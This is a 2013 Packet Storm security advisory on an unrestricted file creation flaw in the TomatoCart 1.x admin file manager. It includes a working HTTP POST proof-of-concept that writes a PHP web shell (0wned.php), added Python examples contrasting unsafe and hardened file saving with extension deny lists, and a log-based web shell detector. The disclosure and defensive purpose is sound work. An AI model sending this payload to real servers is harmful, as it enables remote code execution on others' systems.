TomatoCart 1.x Unrestricted File Creation

2013-01-04T00:00:00
ID PACKETSTORM:119255
Type packetstorm
Reporter Aung Khant
Modified 2013-01-04T00:00:00

Description

1. OVERVIEW
  
TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.  
  
  
2. BACKGROUND  
  
TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Built with Web 2.0 technology (Ajax and
Rich Internet Applications), it is described by the TomatoCart team
as an effort to build a landmark eCommerce solution.
  
  
3. VULNERABILITY DESCRIPTION  
  
TomatoCart 1.x versions contain a flaw in the /admin/json.php script:
the file_manager module's save_file action writes a file whose name,
directory and content are all taken from request parameters, without
restricting the name or extension of the file it creates. An attacker
who can invoke this action can therefore write an arbitrary PHP script
under the web root and request it, executing commands on the
application server and launching further attacks from there. The
proof-of-concept in section 5 is sent with an administrator session
cookie (toCAdminID) and a token parameter equal to that session ID, so
as shown the issue is exploitable from any administrator session,
legitimate or stolen.
  
  
4. VERSIONS AFFECTED  
  
Tested on 1.1.8, 1.1.5  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
/////////////////////////////////////////////////////////////////////  
POST /admin/json.php HTTP/1.1  
Host: localhost  
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 195  
  
module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo '<h1>0wned!</h1><pre>';+echo `ls+-al`; ?>
///////////////////////////////////////////////////////////////  
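The save operation the request above drives, as an added example in Python rather than the application's PHP: the unsafe pattern the advisory describes beside a hardened version that enforces an extension allowlist and path containment. This is not TomatoCart's code; the web root, the allow and deny lists and all function names are assumptions for illustration, and the check functions touch no disk so they can be exercised with the advisory's own parameters.

```python
"""Added example, not TomatoCart's own code: the unsafe file-save pattern the
advisory describes, beside a hardened version of the same operation.
Web root, allow/deny lists and function names are hypothetical."""
import os
import posixpath

# Hypothetical allowlist of what an admin file manager legitimately writes.
# Anything the web server could execute is deliberately absent.
ALLOWED_FINAL_EXT = {"txt", "css", "js", "html", "htm", "csv", "json", "xml"}
# Non-exhaustive: closes the multi-extension trick ('0wned.php.txt') that
# some Apache mod_mime setups still hand to the PHP handler. The allowlist on
# the final extension is the real control; this only backs it up.
DENIED_ANY_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                  "cgi", "pl", "py", "sh"}


def save_file_unsafe(web_root, directory, file_name, content):
    """The pattern behind the advisory: name, directory and content come
    straight from the request, so directory=/ and file_name=0wned.php put a
    PHP file under the web root. Shown for contrast only."""
    target = os.path.join(web_root, directory.lstrip("/"), file_name)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "w") as fh:
        fh.write(content)
    return target


def resolve_target(web_root, directory, file_name):
    """Return the absolute path a save request may write to, or raise
    ValueError. Checks the bare name, the extension chain and containment."""
    if not file_name or file_name != posixpath.basename(file_name):
        raise ValueError("file name must be a bare name, got %r" % file_name)
    if file_name.startswith(".") or "\x00" in file_name:
        raise ValueError("dotfiles and NUL bytes are refused")
    parts = file_name.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWED_FINAL_EXT:
        raise ValueError("final extension not permitted: %r" % file_name)
    if any(p in DENIED_ANY_EXT for p in parts[1:]):
        raise ValueError("executable extension inside name: %r" % file_name)
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, directory.lstrip("/"), file_name))
    # realpath collapses '..' and symlinks, so a directory of '../../tmp'
    # resolves outside root and is caught here.
    if os.path.commonpath([root, target]) != root:
        raise ValueError("target %s escapes %s" % (target, root))
    return target


def is_allowed(web_root, directory, file_name):
    """Boolean wrapper around resolve_target; touches no disk."""
    try:
        resolve_target(web_root, directory, file_name)
        return True
    except ValueError:
        return False


def save_file_safe(web_root, directory, file_name, content):
    """Hardened save: validate first, then write with a restrictive mode and
    without following a pre-existing symlink at the target."""
    target = resolve_target(web_root, directory, file_name)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(target, flags, 0o640)
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return target


if __name__ == "__main__":
    ROOT = "/var/www/tomatocart"  # hypothetical install path
    for directory, name in [("/", "0wned.php"), ("/", "0wned.php.txt"),
                            ("../../tmp", "notes.txt"), ("/images/", "style.min.css")]:
        verdict = "allowed" if is_allowed(ROOT, directory, name) else "refused"
        print("directory=%s file_name=%s -> %s" % (directory, name, verdict))
```

Running it classifies the four requests: 0wned.php and 0wned.php.txt are refused, as is a directory of ../../tmp, while style.min.css under /images/ passes. The deny list is a backstop, not the control: the allowlist on the final extension is what keeps the manager from writing code, and a web server configured to execute nothing in writable directories does not care what the file is called.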
  
  
6. SOLUTION  
  
The vendor did not show commitment to hardening the application.
It is recommended to use an alternative shopping cart application with
a good track record of security fixes. Operators who cannot migrate
immediately should at least restrict network access to /admin/, and
configure the web server so that files in any directory the file
manager can write to are served as static content and never executed
as PHP.
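For operators who have to keep an unpatched instance running, the trace this attack leaves in the web server's access log is a POST to /admin/json.php followed shortly by a request for a .php path that the installation never shipped. The following Python is an added detection example, not part of the advisory: the sample log lines, the inventory of known entry points and the time window are constructed for it.

```python
"""Added example, not part of the advisory: a detection heuristic for the
pattern the proof-of-concept leaves in web server access logs. The log
lines, the entry-point inventory and the window are constructed here."""
import re
from datetime import datetime

# Combined/common log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Hypothetical inventory of PHP entry points that legitimately exist in the
# install. In practice generate it from the deployed tree at release time.
KNOWN_PHP = {"/index.php", "/admin/index.php", "/admin/json.php", "/admin/login.php"}

# Constructed sample: one client that writes and then runs 0wned.php, one
# administrator doing normal work, one unrelated client probing a 404.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jan/2013:10:15:01 +0000] "POST /admin/json.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Jan/2013:10:15:03 +0000] "GET /0wned.php HTTP/1.1" 200 913 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Jan/2013:10:16:30 +0000] "POST /admin/json.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Jan/2013:10:16:31 +0000] "GET /admin/index.php?module=orders HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [04/Jan/2013:10:20:00 +0000] "GET /other.php HTTP/1.1" 404 210 "-" "curl/7.26.0"',
]


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect_new_php_execution(lines, window_seconds=600, known=KNOWN_PHP):
    """Flag a request for a .php path outside the inventory that follows a
    POST to /admin/json.php from the same client within the window. The POST
    body is not logged, so this is a heuristic, not proof of a save_file call."""
    alerts = []
    last_json_post = {}  # client ip -> time of its most recent json.php POST
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts, method, path, status = ev
        if method == "POST" and path == "/admin/json.php":
            last_json_post[ip] = ts
            continue
        if path.lower().endswith(".php") and path not in known:
            prev = last_json_post.get(ip)
            if prev is not None and 0 <= (ts - prev).total_seconds() <= window_seconds:
                alerts.append({"ip": ip, "path": path, "status": status,
                               "seconds_after_post": int((ts - prev).total_seconds())})
    return alerts


if __name__ == "__main__":
    for a in detect_new_php_execution(SAMPLE_LOG):
        print("possible web shell: %(ip)s requested %(path)s %(seconds_after_post)ss "
              "after POST /admin/json.php (HTTP %(status)s)" % a)
```

Every admin module talks to json.php, so the POST on its own is noise; the signal is the unknown .php path served afterwards, and a file-integrity check of the web root (any .php not in the release manifest) confirms what the log only suggests.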
  
  
7. VENDOR  
  
Wuxi Elootec Technology Co., Ltd.  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2012-04-22: Contacted the vendor through email  
2012-04-29: Vendor replied and the vulnerability detail was sent  
2013-01-04: Vulnerability not fixed  
2013-01-04: Vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation  
TomatoCart Home Page: http://www.tomatocart.com/  
  
#yehg [2013-01-04]  
  
---------------------------------  
Best regards,  
YGN Ethical Hacker Group  
Yangon, Myanmar  
http://yehg.net  
Our Lab | http://yehg.net/lab  
Our Directory | http://yehg.net/hwd  